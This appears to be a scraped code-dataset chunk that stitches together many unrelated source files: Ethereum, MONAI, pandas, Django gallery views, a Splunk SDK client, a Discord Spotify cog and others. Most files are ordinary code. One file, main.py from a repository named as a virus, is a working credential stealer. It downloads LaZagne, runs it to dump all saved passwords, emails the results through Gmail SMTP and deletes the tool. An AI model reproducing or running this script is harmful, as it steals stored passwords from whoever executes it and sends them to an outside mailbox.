BlockHeader,
)
from eth.vm.forks.byzantium.blocks import (
ByzantiumBlock,
)
from .transactions import (
PetersburgTransaction,
)
class PetersburgBlock(ByzantiumBlock):
transaction_builder = PetersburgTransaction
fields = [
('header', BlockHeader),
('transactions', CountableList(transaction_builder)),
('uncles', CountableList(BlockHeader))
]
| 1.789063 | 2 |
tests/runner.py | crnbaker/MONAI | 1 | 4944 | <reponame>crnbaker/MONAI
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import inspect
import os
import sys
import time
import unittest
from monai.utils import PerfContext
results: dict = dict()
class TimeLoggingTestResult(unittest.TextTestResult):
"""Overload the default results so that we can store the results."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.timed_tests = dict()
def startTest(self, test): # noqa: N802
"""Start timer, print test name, do normal test."""
self.start_time = time.time()
name = self.getDescription(test)
self.stream.write(f"Starting test: {name}...\n")
super().startTest(test)
def stopTest(self, test): # noqa: N802
"""On test end, get time, print, store and do normal behaviour."""
elapsed = time.time() - self.start_time
name = self.getDescription(test)
self.stream.write(f"Finished test: {name} ({elapsed:.03}s)\n")
if name in results:
raise AssertionError("expected all keys to be unique")
results[name] = elapsed
super().stopTest(test)
def print_results(results, discovery_time, thresh, status):
# only keep results >= threshold
results = dict(filter(lambda x: x[1] > thresh, results.items()))
if len(results) == 0:
return
print(f"\n\n{status}, printing completed times >{thresh}s in ascending order...\n")
timings = dict(sorted(results.items(), key=lambda item: item[1]))
for r in timings:
if timings[r] >= thresh:
print(f"{r} ({timings[r]:.03}s)")
print(f"test discovery time: {discovery_time:.03}s")
print(f"total testing time: {sum(results.values()):.03}s")
print("Remember to check above times for any errors!")
def parse_args(default_pattern):
parser = argparse.ArgumentParser(description="Runner for MONAI unittests with timing.")
parser.add_argument(
"-s", action="store", dest="path", default=".", help="Directory to start discovery (default: '%(default)s')"
)
parser.add_argument(
"-p",
action="store",
dest="pattern",
default=default_pattern,
help="Pattern to match tests (default: '%(default)s')",
)
parser.add_argument(
"-t",
"--thresh",
dest="thresh",
default=10.0,
type=float,
help="Display tests longer than given threshold (default: %(default)d)",
)
parser.add_argument(
"-v",
"--verbosity",
action="store",
dest="verbosity",
type=int,
default=1,
help="Verbosity level (default: %(default)d)",
)
parser.add_argument("-q", "--quick", action="store_true", dest="quick", default=False, help="Only do quick tests")
parser.add_argument(
"-f", "--failfast", action="store_true", dest="failfast", default=False, help="Stop testing on first failure"
)
args = parser.parse_args()
print(f"Running tests in folder: '{args.path}'")
if args.pattern:
print(f"With file pattern: '{args.pattern}'")
return args
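# Illustrative invocation (assumed paths/values):
#   python tests/runner.py -s tests -p "test_*.py" -t 5 -q -f
# runs the quick tests under ./tests, stops at the first failure, and reports
# any test that takes longer than 5 seconds.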
def get_default_pattern(loader):
signature = inspect.signature(loader.discover)
params = {k: v.default for k, v in signature.parameters.items() if v.default is not inspect.Parameter.empty}
return params["pattern"]
if __name__ == "__main__":
loader = unittest.TestLoader()
default_pattern = get_default_pattern(loader)
# Parse input arguments
args = parse_args(default_pattern)
# If quick is desired, set environment variable
if args.quick:
os.environ["QUICKTEST"] = "True"
# Get all test names (optionally from some path with some pattern)
with PerfContext() as pc:
tests = loader.discover(args.path, args.pattern)
discovery_time = pc.total_time
print(f"time to discover tests: {discovery_time}s")
test_runner = unittest.runner.TextTestRunner(
resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast
)
# Use try catches to print the current results if encountering exception or keyboard interruption
try:
test_result = test_runner.run(tests)
print_results(results, discovery_time, args.thresh, "tests finished")
sys.exit(not test_result.wasSuccessful())
except KeyboardInterrupt:
print_results(results, discovery_time, args.thresh, "tests cancelled")
sys.exit(1)
except Exception:
print_results(results, discovery_time, args.thresh, "exception reached")
raise
| 2.453125 | 2 |
venv/Lib/site-packages/pandas/core/array_algos/transforms.py | arnoyu-hub/COMP0016miemie | 0 | 4945 | """
transforms.py is for shape-preserving functions.
"""
import numpy as np
def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray:
new_values = values
if periods == 0 or values.size == 0:
return new_values.copy()
# make sure array sent to np.roll is c_contiguous
f_ordered = values.flags.f_contiguous
if f_ordered:
new_values = new_values.T
axis = new_values.ndim - axis - 1
if new_values.size:
new_values = np.roll(
new_values,
np.intp(periods),
axis=axis,
)
axis_indexer = [slice(None)] * values.ndim
if periods > 0:
axis_indexer[axis] = slice(None, periods)
else:
axis_indexer[axis] = slice(periods, None)
new_values[tuple(axis_indexer)] = fill_value
# restore original order
if f_ordered:
new_values = new_values.T
return new_values
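# Illustrative behaviour (assumed example, not part of the pandas source):
#   shift(np.array([1, 2, 3, 4]), periods=1, axis=0, fill_value=0)  -> [0, 1, 2, 3]
#   shift(np.array([1, 2, 3, 4]), periods=-1, axis=0, fill_value=0) -> [2, 3, 4, 0]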
| 3.046875 | 3 |
students/models/group.py | Stanislav-Rybonka/studentsdb | 1 | 4946 | <filename>students/models/group.py
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
class Group(models.Model):
"""
Group model
"""
title = models.CharField(max_length=256, blank=False, verbose_name=_('Name'))
leader = models.OneToOneField(
'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL)
notes = models.TextField(blank=True, verbose_name=_('Additional notices'))
class Meta(object):
verbose_name = _('Group')
verbose_name_plural = _('Groups')
def __str__(self):
if self.leader:
return '{} ({} {})'.format(
self.title, self.leader.first_name, self.leader.last_name)
        else:
            return '{}'.format(self.title)
| 2.296875 | 2 |
frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | 0 | 4947 | from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
        retries = 0
        while retries < 10:
            try:
                self.__publicKey = self.fetch_public_key()
                return self.__publicKey
            except Exception as e:
                retries = retries + 1
                logger.error(
                    'could not get public key from frontegg, retry number - ' + str(retries) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| 2.1875 | 2 |
splunk_sdk/action/v1beta2/gen_action_service_api.py | ianlee4/splunk-cloud-sdk-python | 12 | 4948 | <reponame>ianlee4/splunk-cloud-sdk-python
# coding: utf-8
# Copyright © 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Action Service
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
OpenAPI spec version: v1beta2.12 (recommended default)
Generated by: https://openapi-generator.tech
"""
from requests import Response
from string import Template
from typing import List, Dict
from splunk_sdk.base_client import handle_response
from splunk_sdk.base_service import BaseService
from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel
from splunk_sdk.action.v1beta2.gen_models import Action
from splunk_sdk.action.v1beta2.gen_models import ActionMutable
from splunk_sdk.action.v1beta2.gen_models import ActionResult
from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail
from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey
from splunk_sdk.action.v1beta2.gen_models import ServiceError
from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
class ActionService(BaseService):
"""
Action Service
Version: v1beta2.12
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
"""
def __init__(self, base_client):
super().__init__(base_client)
def create_action(self, action: Action, query_params: Dict[str, object] = None) -> Action:
"""
Creates an action template.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/action/v1beta2/actions").substitute(path_params)
url = self.base_client.build_url(path)
data = action.to_dict()
response = self.base_client.post(url, json=data, params=query_params)
return handle_response(response, Action)
def delete_action(self, action_name: str, query_params: Dict[str, object] = None) -> SSCVoidModel:
"""
Removes an action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.delete(url, params=query_params)
return handle_response(response, )
def get_action(self, action_name: str, query_params: Dict[str, object] = None) -> Action:
"""
Returns a specific action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, Action)
def get_action_status(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> ActionResult:
"""
Returns the status of an action that was invoked. The status is available for 4 days after the last status change.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
"status_id": status_id,
}
path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, ActionResult)
def get_action_status_details(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> List[ActionResultEmailDetail]:
"""
Returns the status details of the invoked email action. The status is available for 4 days after the last status change.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
"status_id": status_id,
}
path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}/details").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, ActionResultEmailDetail)
def get_public_webhook_keys(self, query_params: Dict[str, object] = None) -> List[PublicWebhookKey]:
"""
Returns an array of one or two webhook keys. The first key is active. The second key, if present, is expired.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/system/action/v1beta2/webhook/keys").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, PublicWebhookKey)
def list_actions(self, query_params: Dict[str, object] = None) -> List[Action]:
"""
Returns the list of action templates.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/action/v1beta2/actions").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, Action)
def trigger_action(self, action_name: str, trigger_event: TriggerEvent, query_params: Dict[str, object] = None) -> SSCVoidModel:
"""
Invokes an action.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
data = trigger_event.to_dict()
response = self.base_client.post(url, json=data, params=query_params)
return handle_response(response, )
def update_action(self, action_name: str, action_mutable: ActionMutable, query_params: Dict[str, object] = None) -> Action:
"""
Modifies an action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
data = action_mutable.to_dict()
response = self.base_client.patch(url, json=data, params=query_params)
return handle_response(response, Action)
| 1.75 | 2 |
src/brewlog/home/__init__.py | zgoda/brewlog | 3 | 4949 | <filename>src/brewlog/home/__init__.py
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
| 1.429688 | 1 |
main.py | TheRavehorn/DownloadExecuteReport-Virus | 0 | 4950 | #!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("<EMAIL>", "yourpassword", result)
os.remove("lazagne.exe")
| 2.84375 | 3 |
SmartAPI/rdf/LinkedList.py | Kreastr/SmartAPI-HEILA | 0 | 4951 | from SmartAPI.rdf.List import List
class LinkedList(List):
def __init__(self):
List.__init__(self)
| 1.945313 | 2 |
frog/views/gallery.py | dreamhaven/Frog | 3 | 4952 | ##################################################################################################
# Copyright (c) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def get(request, obj_id=None):
if obj_id:
obj = Gallery.objects.get(pk=obj_id)
if obj.security != Gallery.PUBLIC and request.user.is_anonymous:
raise PermissionDenied
else:
res = Result()
personal = []
clearance = Gallery.PUBLIC
if request.user.is_authenticated:
personal = Gallery.objects.filter(
security=Gallery.PERSONAL, owner=request.user
)
try:
clearance = request.user.frog_prefs.first().clearance
except AttributeError:
clearance = Gallery.PUBLIC
# Staff members should see everything
if request.user.is_staff:
clearance = Gallery.GUARDED
objects = Gallery.objects.filter(security__lte=clearance)
ids = []
for gallery in objects:
if gallery.security == Gallery.PERSONAL:
continue
if gallery.id in ids:
continue
ids.append(gallery.id)
res.append(gallery.json())
for gallery in personal:
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def post(request):
""" Create a Gallery """
defaultname = "New Gallery %i" % Gallery.objects.all().count()
data = json.loads(request.body)["body"]
title = data.get("title", defaultname)
description = data.get("description", "")
security = int(
data.get("security", request.user.frog_prefs.first().clearance)
)
g, created = Gallery.objects.get_or_create(title=title)
g.security = security
g.description = description
g.owner = request.user
g.save()
res = Result()
res.append(g.json())
res.message = "Gallery created" if created else ""
return JsonResponse(res.asDict())
@login_required
def put(request, obj_id=None):
""" Adds Image and Video objects to Gallery based on GUIDs """
data = json.loads(request.body)["body"]
guids = data.get("guids", "").split(",")
move = data.get("from")
security = data.get("security")
gallery = Gallery.objects.get(pk=obj_id)
# Set the security first so subsequent securityChecks will get the correct security level
if security is not None:
gallery.security = json.loads(security)
gallery.save()
for child in gallery.gallery_set.all():
child.security = gallery.security
child.save()
if guids:
items = getObjectsFromGuids(guids)
gallery.addItems(items)
if move:
fromgallery = Gallery.objects.get(pk=move)
fromgallery.removeItems(items)
res = Result()
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def delete(request, obj_id=None):
""" Removes ImageVideo objects from Gallery """
data = json.loads(request.body)
guids = data.get("guids").split(",")
items = getObjectsFromGuids(guids)
gallery = Gallery.objects.get(pk=obj_id)
LOGGER.info(
"{} removed {} from {}".format(request.user.email, guids, gallery)
)
gallery.removeItems(items)
res = Result()
return JsonResponse(res.asDict())
@login_required
def filterObjects(request, obj_id):
"""
Filters Gallery for the requested ImageVideo objects. Returns a Result object with
serialized objects
"""
if int(obj_id) == 0:
obj = None
else:
obj = Gallery.objects.get(pk=obj_id)
isanonymous = request.user.is_anonymous
if isanonymous and obj is None:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if isanonymous and obj and obj.security != Gallery.PUBLIC:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if obj and obj.security != Gallery.PERSONAL:
if request.user.frog_prefs.first().clearance < obj.security:
raise PermissionDenied()
tags = json.loads(request.GET.get("filters", "[[]]"))
more = json.loads(request.GET.get("more", "false"))
orderby = request.GET.get(
"orderby", request.user.frog_prefs.get().json()["orderby"]
)
tags = [t for t in tags if t]
return _filter(request, obj, tags=tags, more=more, orderby=orderby)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
:param more -- bool, Returns more of the same filtered set of images based on session range
return list, Objects filtered
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
@require_POST
@login_required
def subscribe(request, obj_id):
gallery = Gallery.objects.get(pk=obj_id)
data = json.loads(request.body)["body"]
frequency = data.get("frequency", GallerySubscription.WEEKLY)
sub, created = GallerySubscription.objects.get_or_create(
gallery=gallery, user=request.user, frequency=frequency
)
if not created:
# it already existed so delete it
sub.delete()
return JsonResponse(Result().asDict())
| 0.992188 | 1 |
pirates/speedchat/PSpeedChatQuestMenu.py | itsyaboyrocket/pirates | 3 | 4953 | <reponame>itsyaboyrocket/pirates
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.speedchat.PSpeedChatQuestMenu
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCTerminal import *
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from pirates.quest.Quest import Quest
from pirates.speedchat.PSpeedChatQuestTerminal import *
from pirates.pirate.LocalPirate import *
from pirates.quest.QuestStatus import *
from pirates.quest.QuestDNA import *
class PSpeedChatQuestMenu(SCMenu):
__module__ = __name__
def __init__(self):
SCMenu.__init__(self)
self.accept('localAvatarQuestAdded', self.__questMenuRefresh)
self.accept('localAvatarQuestUpdate', self.__questMenuRefresh)
self.accept('localAvatarQuestItemUpdate', self.__questMenuRefresh)
self.accept('localAvatarQuestComplete', self.__questMenuRefresh)
self.accept('localAvatarQuestDeleted', self.__questMenuRefresh)
def destroy(self):
SCMenu.destroy(self)
def __questMenuRefresh(self, quest, item=None, note=None):
self.clearMenu()
quests = localAvatar.questStatus.getCurrentQuests()
if quests is None:
return
for quest in quests:
q = quest
if q is None:
continue
if not q.isComplete():
self.__questAddSCChat(q)
return
def __questAddSCChat(self, quest):
qId = quest.questId
qDNA = QuestDB.QuestDict.get(qId)
if not qDNA:
return
qInt = qDNA.questInt
i = 0
for task in quest.questDNA.getTasks():
if len(quest.getSCSummaryText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCSummaryText(i), qInt, quest.giverId, 0, i))
if len(quest.getSCWhereIsText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCWhereIsText(i), qInt, quest.giverId, 1, i))
if len(quest.getSCHowToText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCHowToText(i), qInt, quest.giverId, 2, i))
i = i + 1 | 2.1875 | 2 |
spotifyembed/spotifyembed.py | R3XET/coffee-cogs | 0 | 4954 | # from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
class Spotifyembed(commands.Cog):
"""Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account."""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, identifier=806715409318936616)
default_guild = {
"spotifyembedEnabled": False,
}
self.config.register_guild(**default_guild)
@commands.group(aliases=["setspembed", "setspe"])
@checks.guildowner_or_permissions()
async def setspotifyembed(self, ctx: commands.Context):
"""Set Spotify Embed settings"""
if not ctx.invoked_subcommand:
# Guild settings
e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="")
e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False)
await ctx.send(embed=e)
@setspotifyembed.command(name="enable")
async def setspembedenable(self, ctx):
"""Enable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(True)
await ctx.message.add_reaction("✅")
@setspotifyembed.command(name="disable")
async def setspembeddisable(self, ctx):
"""Disable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(False)
await ctx.message.add_reaction("✅")
@commands.command(aliases=["spembed", "spe"])
async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False):
"""Return a Spotify embed link
Can set asMyself to true/false, for sending as webhook"""
spembedSplit = spotifyLink.split('.com/')
sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1]
if asMyself == False:
return await ctx.send(sendMsg)
elif asMyself == True:
# Find a webhook that the bot made
try:
whooklist = await ctx.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await ctx.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=ctx.author.display_name,
avatar_url=ctx.author.avatar_url,
)
except discord.errors.Forbidden:
return await ctx.send(sendMsg)
else:
return await ctx.send("An error occurred.")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if message.webhook_id:
return
if message.guild is None:
return
spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled()
if spotifyembedEnabled is not True:
return
# Ignore if we find [p]spotifyembed in the trigger message
spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)"
spembedCommands = re.findall(spembedCommandIgnore, message.clean_content)
if len(spembedCommands) > 0:
return
# Ignore if we find no spotify links in the trigger message
spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)"
spembedMatches = re.findall(spembedFinder, message.clean_content)
if len(spembedMatches) <= 0:
return
sendMsg = ""
for match in spembedMatches:
spembedSplit = match.split('.com/')
sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n"
# Find a webhook that the bot made
try:
whooklist = await message.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await message.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=message.author.display_name,
avatar_url=message.author.avatar_url,
)
except discord.errors.Forbidden:
return await message.channel.send(sendMsg)
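def _example_embed_rewrite(spotify_link="https://open.spotify.com/track/<id>"):
    # Sketch of the rewrite performed by this cog: splice "embed/" in after the
    # domain ("<id>" is a placeholder, not a real track id).
    left, right = spotify_link.split(".com/")
    return left + ".com/embed/" + right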
| 2.59375 | 3 |
rlcard/utils/seeding.py | AdrianP-/rlcard | 0 | 4955 | <reponame>AdrianP-/rlcard
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
